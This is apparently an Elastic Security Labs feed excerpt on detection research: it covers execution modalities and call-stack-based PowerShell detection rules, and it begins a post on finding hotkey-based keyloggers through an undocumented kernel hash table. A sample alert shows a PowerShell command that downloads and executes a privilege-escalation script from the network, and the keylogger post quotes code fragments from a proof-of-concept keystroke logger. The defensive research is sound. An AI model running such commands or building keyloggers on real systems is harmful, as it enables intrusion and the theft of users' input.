<p>Due to their history of abuse, some modalities have been extended with extra logging - one important example is PowerShell.  This allows certain techniques to be detected with high precision - but <em>only</em> when executed within PowerShell. It is important not to conflate having detection coverage of a technique in PowerShell with coverage of that technique in general. This nuance is important when estimating <a href="https://attack.mitre.org/">MITRE ATT&amp;CK</a> coverage.  As red teams routinely demonstrate, having 100% technique coverage - but only for PowerShell - is close to 0% real-world coverage.</p>
<p><a href="https://ctid.mitre.org/projects/summiting-the-pyramid/">Summiting the Pyramid</a> (STP) is a related analytic scoring methodology from MITRE. It makes a similar conclusion about the fragility of <a href="https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/">PowerShell scriptblock-based detections</a> and assigns such rules a low robustness score.</p>
<p>High-level telemetry sources, such as Process Creation logging and PowerShell logging, are extremely brittle at detecting most techniques as they cover very few modalities. At best, they assist in detecting the most egregious Living off the Land (LotL) abuses.</p>
<p>Atkinson made the following astute observation in the <a href="https://posts.specterops.io/behavior-vs-execution-modality-3318e8e81739">example</a> used to motivate the discussion:</p>
<p><em>An important point is that our higher-order objective in detection is behavior-based, not modality-based. Therefore, we should be interested in detecting Session Enumeration (behavior-focused), not Session Enumeration in PowerShell (modality-focused).</em></p>
<p>Sometimes that is only half of the story though.  Sometimes detecting that the tool itself is out of context is more efficient than detecting the technique. Sometimes the execution modality itself is anomalous.</p>
<p>An alternative to detecting a known technique is to detect a misbehaving modality.</p>
<h2><strong>Call stacks divulge Modality</strong></h2>
<p>One of Elastic’s strengths is the inclusion of call stacks in the majority of our events. This level of call provenance detail greatly assists in determining whether a given activity is malicious or benign.  Call stack summaries are often sufficient to divulge the execution modality - the runtimes for PowerShell, .NET, RPC, WMI, VBA, Lua, Python, and Java all leave traces in the call stack.</p>
<p>Some of our <a href="https://www.elastic.co/kr/security-labs/upping-the-ante-detecting-in-memory-threats-with-kernel-call-stacks">first call stack-based rules</a> were for Office VBA macros (<code>vbe7.dll</code>) spawning child processes or dropping files, and for unbacked executable memory loading the .NET runtime.  In both of these examples, the technique itself was largely benign; it was the modality of the behaviour that was predominantly anomalous.</p>
<p>So can we flip the typical behaviour-focused detection approach to a modality-focused one?  For example, can we detect solely on the use of <strong>any</strong> dual-purpose API call originating from PowerShell?</p>
<p>Using call stacks, Elastic is able to differentiate between the API calls that originate from PowerShell scripts and those that come from the PowerShell or .NET runtimes.</p>
<p>Using Threat-Intelligence ETW as an approximation for a dual-purpose API, our rule for “Suspicious API Call from a PowerShell Script” was quite effective.</p>
<pre><code class="language-sql">api where
event.provider == &quot;Microsoft-Windows-Threat-Intelligence&quot; and
process.name in~ (&quot;powershell.exe&quot;, &quot;pwsh.exe&quot;, &quot;powershell_ise.exe&quot;) and

/* PowerShell Script JIT - and incidental .NET assemblies */
process.thread.Ext.call_stack_final_user_module.name == &quot;Unbacked&quot; and
process.thread.Ext.call_stack_final_user_module.protection_provenance in (&quot;clr.dll&quot;, &quot;mscorwks.dll&quot;, &quot;coreclr.dll&quot;) and

/* filesystem enumeration activity */
not process.Ext.api.summary like &quot;IoCreateDevice( \\FileSystem\\*, (null) )&quot; and

/* exclude nop operations */
not (process.Ext.api.name == &quot;VirtualProtect&quot; and process.Ext.api.parameters.protection == &quot;RWX&quot; and process.Ext.api.parameters.protection_old == &quot;RWX&quot;) and

/* Citrix GPO Scripts */
not (process.parent.executable : &quot;C:\\Windows\\System32\\gpscript.exe&quot; and
  process.Ext.api.summary in (&quot;VirtualProtect( Unbacked, 0x10, RWX, RW- )&quot;, &quot;WriteProcessMemory( Self, Unbacked, 0x10 )&quot;, &quot;WriteProcessMemory( Self, Data, 0x10 )&quot;)) and

/* cybersecurity tools */
not (process.Ext.api.name == &quot;VirtualAlloc&quot; and process.parent.executable : (&quot;C:\\Program Files (x86)\\CyberCNSAgent\\cybercnsagent.exe&quot;, &quot;C:\\Program Files\\Velociraptor\\Velociraptor.exe&quot;)) and

/* module listing */
not (process.Ext.api.name in (&quot;EnumProcessModules&quot;, &quot;GetModuleInformation&quot;, &quot;K32GetModuleBaseNameW&quot;, &quot;K32GetModuleFileNameExW&quot;) and
  process.parent.executable : (&quot;*\\Lenovo\\*\\BGHelper.exe&quot;, &quot;*\\Octopus\\*\\Calamari.exe&quot;)) and

/* WPM triggers multiple times at process creation */
not (process.Ext.api.name == &quot;WriteProcessMemory&quot; and
     process.Ext.api.metadata.target_address_name in (&quot;PEB&quot;, &quot;PEB32&quot;, &quot;ProcessStartupInfo&quot;, &quot;Data&quot;) and
     _arraysearch(process.thread.Ext.call_stack, $entry, $entry.symbol_info like (&quot;?:\\windows\\*\\kernelbase.dll!CreateProcess*&quot;, &quot;Unknown&quot;)))
</code></pre>
<p>Even though we don’t need to use the brittle PowerShell AMSI logging for detection, we can still provide this detail in the event as context as it assists with triage.  This modality-based approach even detects common PowerShell defence evasion tradecraft such as:</p>
<ul>
<li>ntdll unhooking</li>
<li>AMSI patching</li>
<li>user-mode ETW patching</li>
</ul>
<pre><code class="language-json">{
 &quot;event&quot;: {
  &quot;provider&quot;: &quot;Microsoft-Windows-Threat-Intelligence&quot;,
  &quot;created&quot;: &quot;2025-01-29T18:27:09.4386902Z&quot;,
  &quot;kind&quot;: &quot;event&quot;,
  &quot;category&quot;: &quot;api&quot;,
  &quot;type&quot;: &quot;change&quot;,
  &quot;outcome&quot;: &quot;unknown&quot;
 },
 &quot;message&quot;: &quot;Endpoint API event - VirtualProtect&quot;,
 &quot;process&quot;: {
  &quot;parent&quot;: {
   &quot;executable&quot;: &quot;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&quot;
  },
  &quot;name&quot;: &quot;powershell.exe&quot;,
  &quot;executable&quot;: &quot;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe&quot;,
  &quot;code_signature&quot;: {
   &quot;trusted&quot;: true,
   &quot;subject_name&quot;: &quot;Microsoft Windows&quot;,
   &quot;exists&quot;: true,
   &quot;status&quot;: &quot;trusted&quot;
  },
  &quot;command_line&quot;: &quot;\&quot;powershell.exe\&quot; &amp; {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}&quot;,
  &quot;pid&quot;: 21908,
  &quot;Ext&quot;: {
   &quot;api&quot;: {
    &quot;summary&quot;: &quot;VirtualProtect( kernel32.dll!FatalExit, 0x21, RWX, R-X )&quot;,
    &quot;metadata&quot;: {
     &quot;target_address_path&quot;: &quot;c:\\windows\\system32\\kernel32.dll&quot;,
     &quot;amsi_logs&quot;: [
      {
       &quot;entries&quot;: [
        &quot;&amp; {iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}&quot;,
        &quot;{iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem}&quot;,
        &quot;function Get-WinLogonTokenSystem\n{\nfunction _10001011000101101\n{\n  [CmdletBinding()]\n  Param(\n [Parameter(Position = 0, Mandatory = $true)]\n [ValidateNotNullOrEmpty()]\n [Byte[]]\n ${_00110111011010011},\n ...&lt;truncated&gt;&quot;,
        &quot;{[Char] $_}&quot;,
        &quot;{\n [CmdletBinding()]\n Param(\n   [Parameter(Position = 0, Mandatory = $true)]\n   [Byte[]]\n   ${_00110111011010011},\n   [Parameter(Position = 1, Mandatory = $true)]\n   [String]\n   ${_10100110010101100},\n ...&lt;truncated&gt;&quot;,
        &quot;{ $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwB5AHMAdABlAG0ALgBkAGwAbAA=')))) }&quot;
       ],
       &quot;type&quot;: &quot;PowerShell&quot;
      }
     ],
     &quot;target_address_name&quot;: &quot;kernel32.dll!FatalExit&quot;,
     &quot;amsi_filenames&quot;: [
      &quot;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1&quot;,
      &quot;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1&quot;
     ]
    },
    &quot;behaviors&quot;: [
     &quot;sensitive_api&quot;,
     &quot;hollow_image&quot;,
     &quot;unbacked_rwx&quot;
    ],
    &quot;name&quot;: &quot;VirtualProtect&quot;,
    &quot;parameters&quot;: {
     &quot;address&quot;: 140727652261072,
     &quot;size&quot;: 33,
     &quot;protection_old&quot;: &quot;R-X&quot;,
     &quot;protection&quot;: &quot;RWX&quot;
    }
   },
   &quot;code_signature&quot;: [
    {
     &quot;trusted&quot;: true,
     &quot;subject_name&quot;: &quot;Microsoft Windows&quot;,
     &quot;exists&quot;: true,
     &quot;status&quot;: &quot;trusted&quot;
    }
   ],
   &quot;token&quot;: {
    &quot;integrity_level_name&quot;: &quot;high&quot;
   }
  },
  &quot;thread&quot;: {
   &quot;Ext&quot;: {
    &quot;call_stack_summary&quot;: &quot;ntdll.dll|kernelbase.dll|Unbacked&quot;,
    &quot;call_stack_contains_unbacked&quot;: true,
    &quot;call_stack&quot;: [
     {
      &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\ntdll.dll!NtProtectVirtualMemory+0x14&quot;
     },
     {
      &quot;symbol_info&quot;: &quot;c:\\windows\\system32\\kernelbase.dll!VirtualProtect+0x3b&quot;
     },
     {
      &quot;symbol_info&quot;: &quot;Unbacked+0x3b5c&quot;,
      &quot;protection_provenance&quot;: &quot;clr.dll&quot;,
      &quot;callsite_trailing_bytes&quot;: &quot;41c644240c01833dab99f35f007406ff15b7b6f25f8bf0e85883755f85f60f95c00fb6c00fb6c041c644240c01488b55884989542410488d65c85b5e5f415c41&quot;,
      &quot;protection&quot;: &quot;RWX&quot;,
      &quot;callsite_leading_bytes&quot;: &quot;df765f4d63f64c897dc0488d55b8488bcee8ee6da95f4d8bcf488bcf488bd34d8bc64533db4c8b55b84c8955904c8d150c0000004c8955a841c644240c00ffd0&quot;
     }
    ],
    &quot;call_stack_final_user_module&quot;: {
     &quot;code_signature&quot;: [
      {
       &quot;trusted&quot;: true,
       &quot;subject_name&quot;: &quot;Microsoft Corporation&quot;,
       &quot;exists&quot;: true,
       &quot;status&quot;: &quot;trusted&quot;
      }
     ],
     &quot;protection_provenance_path&quot;: &quot;c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\clr.dll&quot;,
     &quot;name&quot;: &quot;Unbacked&quot;,
     &quot;protection_provenance&quot;: &quot;clr.dll&quot;,
     &quot;protection&quot;: &quot;RWX&quot;,
     &quot;hash&quot;: {
      &quot;sha256&quot;: &quot;707564fc98c58247d088183731c2e5a0f51923c6d9a94646b0f2158eb5704df4&quot;
     }
    }
   },
   &quot;id&quot;: 17260
  }
 },
 &quot;user&quot;: {
  &quot;id&quot;: &quot;S-1-5-21-47396387-2833971351-1621354421-500&quot;
 }
}
</code></pre>
<h2><strong>Robustness assessment</strong></h2>
<p>Using the <a href="https://ctid.mitre.org/projects/summiting-the-pyramid/">Summiting the Pyramid</a> analytic scoring methodology we can compare our PowerShell modality-based detection rule with traditional PowerShell</p>
<table>
<thead>
<tr>
<th align="left"></th>
<th align="left">Application (A)</th>
<th align="left">User mode (U)</th>
<th align="left">Kernel mode (K)</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left"><strong>Core to (Sub) Technique (5)</strong></td>
<td align="left"></td>
<td align="left"></td>
<td align="left"><strong>[ best ]</strong> Kernel ETW-based PowerShell modality detections</td>
</tr>
<tr>
<td align="left"><strong>Core to Part of (Sub-) Technique (4)</strong></td>
<td align="left"></td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left"><strong>Core to Pre-Existing Tool (3)</strong></td>
<td align="left"></td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left"><strong>Core to Adversary-brought Tool (2)</strong></td>
<td align="left">AMSI and ScriptBlock-based PowerShell content detections</td>
<td align="left"></td>
<td align="left"></td>
</tr>
<tr>
<td align="left"><strong>Ephemeral (1)</strong></td>
<td align="left"><strong>[ worst ]</strong></td>
<td align="left"></td>
<td align="left"></td>
</tr>
</tbody>
</table>
<p>PowerShell Analytic Scoring using <a href="https://ctid.mitre.org/projects/summiting-the-pyramid/">Summiting the Pyramid</a></p>
<p>As noted earlier, most PowerShell detections receive a low 2A robustness score using the STP scale.  This is in stark contrast to our <a href="https://github.com/elastic/protections-artifacts/blob/065efe897b511e9df5116f9f96b6cbabb68bf1e4/behavior/rules/windows/execution_suspicious_api_call_from_a_powershell_script.toml">PowerShell misbehaving modality rule</a> which receives the highest possible 5K score (where appropriate kernel telemetry is available from Microsoft).</p>
<p>One caveat is that an STP analytic score does not yet include any measure for the setup and maintenance costs of a rule. This could potentially be approximated by the size of the known false positive software list for a given rule - though most open rule sets typically do not include this information. We do and, in our rule’s case, the false positives observed to date have been extremely manageable.</p>
<h2><strong>Can call stacks be spoofed though?</strong></h2>
<p>Yes - and slightly no. Our call stacks are all collected inline in the kernel, but the user-mode call stack itself resides in user-mode memory that the malware may control. This means that, if malware has achieved arbitrary execution, then it can control the stack frames that we see.</p>
<p>Sure, dual-purpose API <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+%22Unbacked+memory%22&amp;type=code">calls from private memory</a> are suspicious, but sometimes trying to hide your private memory is even more suspicious. This can take the form of:</p>
<ul>
<li>Calls from <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+allocation_private_bytes&amp;type=code">overwritten modules</a>.</li>
<li>Return addresses <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+image_rop&amp;type=code">without a preceding call</a> instruction.</li>
<li>Calls <a href="https://github.com/search?q=repo%3Aelastic%2Fprotections-artifacts+proxy_call&amp;type=code">proxied via other modules</a>.</li>
</ul>
<p>Call stack control alone may not be enough. In order to truly bypass some of our call stack detections, an attacker must craft a call stack that entirely blends with normal activity.  In some environments this can be baselined by security teams with high accuracy; making it hard for the attackers to remain undetected. Based on our in-house research, and with the assistance of red team tool developers, we are also continually improving our out-of-the-box detections.</p>
<p>Finally, on modern CPUs there are also numerous execution trace mechanisms that can be used to detect stack spoofing - such as <a href="https://www.blackhat.com/docs/us-16/materials/us-16-Pierce-Capturing-0days-With-PERFectly-Placed-Hardware-Traps-wp.pdf">Intel LBR</a>, Intel BTS, Intel AET, <a href="https://www.microsoft.com/en-us/research/wp-content/uploads/2017/01/griffin-asplos17.pdf">Intel IPT</a>, <a href="https://www.elastic.co/kr/security-labs/finding-truth-in-the-shadows">x64 CET</a> and <a href="https://lwn.net/Articles/824613/">x64 Architectural LBR</a>. Elastic already takes advantage of some of these hardware features, we have suggested to Microsoft that they may also wish to do so in further scenarios outside of exploit protection, and we are investigating further enhancements ourselves. Stay tuned.</p>
<h2><strong>Conclusion</strong></h2>
<p>Execution Modality is a new lens through which we can seek to understand attacker tradecraft.</p>
<p>Detecting specific techniques for individual modalities is not a cost-effective approach though - there are simply too many techniques and too many modalities. Instead, we should focus our technique detections as close to the operating system source of truth as possible; being careful not to lose necessary activity context, or to introduce unmanageable false positives. This is why Elastic considers <a href="https://www.elastic.co/kr/security-labs/kernel-etw-best-etw">Kernel ETW</a> to be superior to user-mode <code>ntdll</code> hooking - it is closer to the source of truth allowing more robust detections.</p>
<p>For modality-based detection approaches, the value becomes apparent when we baseline <strong>all</strong> expected low-level telemetry for a given modality - and trigger on <strong>any</strong> deviations.</p>
<p>Historically, attackers have been able to choose modality for convenience. It is more cost effective to write tools in C# or PowerShell than in C or assembly.  If we can herd modality then we’ve imposed cost.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/misbehaving-modalities/modalities.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure]]></title>
            <link>https://www.elastic.co/kr/security-labs/detecting-hotkey-based-keyloggers</link>
            <guid>detecting-hotkey-based-keyloggers</guid>
            <pubDate>Tue, 04 Mar 2025 00:00:00 GMT</pubDate>
            <description><![CDATA[In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.]]></description>
            <content:encoded><![CDATA[<h1>Detecting Hotkey-Based Keyloggers Using an Undocumented Kernel Data Structure</h1>
<p>In this article, we explore what hotkey-based keyloggers are and how to detect them. Specifically, we explain how these keyloggers intercept keystrokes, then present a detection technique that leverages an undocumented hotkey table in kernel space.</p>
<h2>Introduction</h2>
<p>In May 2024, Elastic Security Labs published <a href="https://www.elastic.co/kr/security-labs/protecting-your-devices-from-information-theft-keylogger-protection">an article</a> highlighting new features added in <a href="https://www.elastic.co/kr/guide/en/integrations/current/endpoint.html">Elastic Defend</a> (starting with 8.12) to enhance the detection of keyloggers running on Windows. In that post, we covered four types of keyloggers commonly employed in cyberattacks — polling-based keyloggers, hooking-based keyloggers, keyloggers using the Raw Input Model, and keyloggers using DirectInput — and explained our detection methodology. In particular, we introduced a behavior-based detection method using the Microsoft-Windows-Win32k provider within <a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/devtest/event-tracing-for-windows--etw-">Event Tracing for Windows</a> (ETW).</p>
<p>Shortly after publication, we were honored to have our article noticed by <a href="https://jonathanbaror.com/">Jonathan Bar Or</a>, Principal Security Researcher at Microsoft. He provided invaluable feedback by pointing out the existence of hotkey-based keyloggers and even shared proof-of-concept (PoC) code with us. Leveraging his PoC code <a href="https://github.com/yo-yo-yo-jbo/hotkeyz">Hotkeyz</a> as a starting point, this article presents one potential method for detecting hotkey-based keyloggers.</p>
<h2>Overview of Hotkey-based Keyloggers</h2>
<h3>What Is a Hotkey?</h3>
<p>Before delving into hotkey-based keyloggers, let’s first clarify what a hotkey is. A hotkey is a type of keyboard shortcut that directly invokes a specific function on a computer by pressing a single key or a combination of keys. For example, many Windows users press <strong>Alt + Tab</strong> to switch between tasks (or, in other words, windows). In this instance, <strong>Alt + Tab</strong> serves as a hotkey that directly triggers the task-switching function.</p>
<p><em>(Note: Although other types of keyboard shortcuts exist, this article focuses solely on hotkeys. Also, <strong>all information herein is based on Windows 10 version 22H2 OS Build 19045.5371 without virtualization based security</strong>. Please note that the internal data structures and behavior may differ in other versions of Windows.)</em></p>
<h3>Abusing Custom Hotkey Registration Functionality</h3>
<p>In addition to using the pre-configured hotkeys in Windows as shown in the previous example, you can also register your own custom hotkeys. There are various methods to do this, but one straightforward approach is to use the Windows API function <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-registerhotkey"><strong>RegisterHotKey</strong></a>, which allows a user to register a specific key as a hotkey. For instance, the following code snippet demonstrates how to use the <strong>RegisterHotKey</strong> API to register the <strong>A</strong> key (with a <a href="https://learn.microsoft.com/en-us/windows/win32/inputdev/virtual-key-codes">virtual-key code</a> of 0x41) as a global hotkey:</p>
<pre><code class="language-c">/*
BOOL RegisterHotKey(
  [in, optional] HWND hWnd, 
  [in]           int  id,
  [in]           UINT fsModifiers,
  [in]           UINT vk
);
*/
RegisterHotKey(NULL, 1, 0, 0x41);
</code></pre>
<p>After registering a hotkey, when the registered key is pressed, a <a href="https://learn.microsoft.com/en-us/windows/win32/inputdev/wm-hotkey"><strong>WM_HOTKEY</strong></a> message is sent to the message queue of the window specified as the first argument to the <strong>RegisterHotKey</strong> API (or to the thread that registered the hotkey if <strong>NULL</strong> is used). The code below demonstrates a message loop that uses the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getmessage"><strong>GetMessage</strong></a> API to check for a <strong>WM_HOTKEY</strong> message in the <a href="https://learn.microsoft.com/en-us/windows/win32/winmsg/about-messages-and-message-queues">message queue</a>, and if one is received, it extracts the virtual-key code (in this case, 0x41) from the message.</p>
<pre><code class="language-c">MSG msg = { 0 };
while (GetMessage(&amp;msg, NULL, 0, 0)) {
    if (msg.message == WM_HOTKEY) {
        int vkCode = HIWORD(msg.lParam);
        std::cout &lt;&lt; &quot;WM_HOTKEY received! Virtual-Key Code: 0x&quot;
            &lt;&lt; std::hex &lt;&lt; vkCode &lt;&lt; std::dec &lt;&lt; std::endl;
    }
}
</code></pre>
<p>In other words, imagine you're writing something in a notepad application. If the A key is pressed, the character won't be treated as normal text input — it will be recognized as a global hotkey instead.</p>
<p>In this example, only the A key is registered as a hotkey. However, you can register multiple keys (like B, C, or D) as separate hotkeys at the same time. This means that any key (i.e., any virtual-key code) that can be registered with the <strong>RegisterHotKey</strong> API can potentially be hijacked as a global hotkey. A hotkey-based keylogger abuses this capability to capture the keystrokes entered by the user.</p>
<p>Based on our testing, we found that not only alphanumeric and basic symbol keys, but also those keys when combined with the SHIFT modifier, can all be registered as hotkeys using the <strong>RegisterHotKey</strong> API. This means that a keylogger can effectively monitor every keystroke necessary to steal sensitive information.</p>
<h3>Capturing Keystrokes Stealthily</h3>
<p>Let's walk through the actual process of how a hotkey-based keylogger captures keystrokes, using the Hotkeyz hotkey-based keylogger as an example.</p>
<p>In Hotkeyz, it first registers each alphanumeric virtual-key code — and some additional keys,  such as <strong>VK_SPACE</strong> and <strong>VK_RETURN</strong> — as individual hotkeys by using the <strong>RegisterHotKey</strong> API.</p>
<p>Then, inside the keylogger's message loop, the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-peekmessagew"><strong>PeekMessageW</strong></a> API is used to check whether any <strong>WM_HOTKEY</strong> messages from these registered hotkeys have appeared in the message queue. When a <strong>WM_HOTKEY</strong> message is detected, the virtual-key code it contains is extracted and eventually saved to a text file. Below is an excerpt from the message loop code, highlighting the most important parts.</p>
<pre><code class="language-c">while (...)
{
    // Get the message in a non-blocking manner and poll if necessary
    if (!PeekMessageW(&amp;tMsg, NULL, WM_HOTKEY, WM_HOTKEY, PM_REMOVE))
    {
        Sleep(POLL_TIME_MILLIS);
        continue;
    }
....
   // Get the key from the message
   cCurrVk = (BYTE)((((DWORD)tMsg.lParam) &amp; 0xFFFF0000) &gt;&gt; 16);

   // Send the key to the OS and re-register
   (VOID)UnregisterHotKey(NULL, adwVkToIdMapping[cCurrVk]);
   keybd_event(cCurrVk, 0, 0, (ULONG_PTR)NULL);
   if (!RegisterHotKey(NULL, adwVkToIdMapping[cCurrVk], 0, cCurrVk))
   {
       adwVkToIdMapping[cCurrVk] = 0;
       DEBUG_MSG(L&quot;RegisterHotKey() failed for re-registration (cCurrVk=%lu,    LastError=%lu).&quot;, cCurrVk, GetLastError());
       goto lblCleanup;
   }
   // Write to the file
  if (!WriteFile(hFile, &amp;cCurrVk, sizeof(cCurrVk), &amp;cbBytesWritten, NULL))
  {
....
</code></pre>
<p>One important detail is this: to avoid alerting the user to the keylogger's presence, once the virtual-key code is extracted from the message, the key's hotkey registration is temporarily removed using the <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-unregisterhotkey"><strong>UnregisterHotKey</strong></a> API. After that, the key press is simulated with <a href="https://learn.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-keybd_event"><strong>keybd_event</strong></a> so that it appears to the user as if the key was pressed normally. Once the key press is simulated, the key is re-registered using the <strong>RegisterHotKey</strong> API to wait for further input. This is the core mechanism behind how a hotkey-based keylogger operates.</p>
<h2>Detecting Hotkey-Based Keyloggers</h2>
<p>Now that we understand what hotkey-based keyloggers are and how they operate, let's explain how to detect them.</p>
<h3>ETW Does Not Monitor the RegisterHotKey API</h3>
<p>Following the approach described in an earlier article, we first investigated whether <a href="https://learn.microsoft.com/en-us/windows/win32/etw/about-event-tracing">Event Tracing for Windows</a> (ETW) could be used to detect hotkey-based keyloggers. Our research quickly revealed that ETW currently does not monitor the <strong>RegisterHotKey</strong> or <strong>UnregisterHotKey</strong> APIs. In addition to reviewing the manifest file for the Microsoft-Windows-Win32k provider, we reverse-engineered the internals of the <strong>RegisterHotKey</strong> API — specifically, the <strong>NtUserRegisterHotKey</strong> function in win32kfull.sys. Unfortunately, we found no evidence that these APIs trigger any ETW events when executed.</p>
<p>The image below shows a comparison between the decompiled code for <strong>NtUserGetAsyncKeyState</strong> (which is monitored by ETW) and <strong>NtUserRegisterHotKey</strong>. Notice that at the beginning of <strong>NtUserGetAsyncKeyState</strong>, there is a call to <strong>EtwTraceGetAsyncKeyState</strong> — a function associated with  logging ETW events — while <strong>NtUserRegisterHotKey</strong> does not contain such a call.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image3.png" alt="Figure 1: Comparison of the Decompiled Code for NtUserGetAsyncKeyState and NtUserRegisterHotKey" />
　<br />
Although we also considered using ETW providers other than Microsoft-Windows-Win32k to indirectly monitor calls to the <strong><code>RegisterHotKey</code></strong> API, we found that the detection method using the &quot;hotkey table&quot; — which will be introduced next and does not rely on ETW — achieves results that are comparable to or even better than monitoring the <strong><code>RegisterHotKey</code></strong> API. In the end, we chose to implement this method.</p>
<h3>Detection Using the Hotkey Table (<strong>gphkHashTable</strong>)</h3>
<p>After discovering that ETW cannot directly monitor calls to the <strong>RegisterHotKey</strong> API, we started exploring detection methods that don't rely on ETW. During our investigation, we wondered, &quot;Isn't the information for registered hotkeys stored somewhere? And if so, could that data be used for detection?&quot; Based on that hypothesis, we quickly found a hash table labeled <strong>gphkHashTable</strong> within <strong>NtUserRegisterHotKey</strong>. Searching Microsoft's online documentation revealed no details on <strong>gphkHashTable</strong>, suggesting that it's an undocumented kernel data structure.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image1.png" alt="Figure 2: The hotkey table (gphkHashTable), discovered within the RegisterHotKey function called inside NtUserRegisterHotKey" /></p>
<p>Through reverse engineering, we discovered that this hash table stores objects containing information about registered hotkeys. Each object holds details such as the virtual-key code and modifiers specified in the arguments to the <strong>RegisterHotKey</strong> API. The right side of Figure 3 shows part of the structure definition for a hotkey object (named <strong>HOT_KEY</strong>), while the left side displays how the registered hotkey objects appear when accessed via WinDbg.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image4.png" alt="Figure 3: Hotkey Object Details. WinDbg view (left) and HOT_KEY structure details (right)" /></p>
<p>We also determined that <strong>ghpkHashTable</strong> is structured as shown in Figure 4.  Specifically, it uses the result of the modulo operation (with 0x80) on the virtual-key code (specified by the RegisterHotKey API) as the index into the hash table. Hotkey objects sharing the same index are linked together in a list, which allows the table to store and manage hotkey information even when the virtual-key codes are identical but the modifiers differ.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image6.png" alt="Figure 4: Structure of gphkHashTable" /></p>
<p>In other words, by scanning all HOT_KEY objects stored in <strong>ghpkHashTable</strong>, we can retrieve details about every registered hotkey. If we find that every main key — for example, each individual alphanumeric key — is registered as a separate hotkey, that strongly indicates the presence of an active hotkey-based keylogger.</p>
<h2>Implementing the Detection Tool</h2>
<p>Now, let's move on to implementing the detection tool. Since <strong>gphkHashTable</strong> resides in the kernel space, it cannot be accessed by a user-mode application. For this reason, it was necessary to develop a device driver for detection. More specifically, we decided to develop a device driver that obtains the address of <strong>gphkHashTable</strong> and scans through all the hotkey objects stored in the hash table. If the number of alphanumeric keys registered as hotkeys exceeds a predefined threshold, it will alert us to the potential presence of a hotkey-based keylogger.</p>
<h3>How to Obtain the Address of <strong>gphkHashTable</strong></h3>
<p>While developing the detection tool, one of the first challenges we faced was how to obtain the address of <strong>gphkHashTable</strong>. After some consideration, we decided to extract the address directly from an instruction in the <strong>win32kfull.sys</strong> driver that accesses <strong>gphkHashTable</strong>.</p>
<p>Through reverse engineering, we discovered that within the IsHotKey function — right at the beginning — there is a lea instruction (lea rbx, <strong>gphkHashTable</strong>) that accesses <strong>gphkHashTable</strong>. We used the opcode byte sequence (0x48, 0x8d, 0x1d) from that instruction as a signature to locate the corresponding line, and then computed the address of <strong>gphkHashTable</strong> using the obtained 32-bit (4-byte) offset.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/detecting-hotkey-based-keyloggers/image5.png" alt="Figure 5: Inside the IsHotKey function" /></p>
<p>Additionally, since <strong>IsHotKey</strong> is not an exported function, we also need to know its address before looking for <strong>gphkHashTable</strong>. Through further reverse engineering, we discovered that the exported function <strong>EditionIsHotKey</strong> calls the <strong>IsHotKey</strong> function. Therefore, we decided to compute the address of IsHotKey within the <strong>EditionIsHotKey</strong> function using the same method described earlier. (For reference, the base address of <strong>win32kfull.sys</strong> can be found using the <strong>PsLoadedModuleList</strong> API.)</p>
<h3>Accessing the Memory Space of <strong>win32kfull.sys</strong></h3>
<p>Once we finalized our approach to obtaining the address of <strong>gphkHashTable</strong>, we began writing code to access the memory space of <strong>win32kfull.sys</strong> to retrieve that address. One challenge we encountered at this stage was that win32kfull.sys is a <em>session driver</em>. Before proceeding further, here’s a brief, simplified explanation of what a <em>session</em> is.</p>
<p>In Windows, when a user logs in, a separate session (with session numbers starting from 1) is assigned to each user. Simply put, the first user to log in is assigned <strong>Session 1</strong>. If another user logs in while that session is active, that user is assigned <strong>Session 2</strong>, and so on. Each user then has their own desktop environment within their assigned session.</p>
<p>Kernel data that must be managed separately for each session (i.e., per logged-in user) is stored in an isolated area of kernel memory called <em>session space</em>. This includes GUI objects managed by win32k drivers, such as windows and mouse/keyboard input data, ensuring that the screen and input remain properly separated between users.</p>
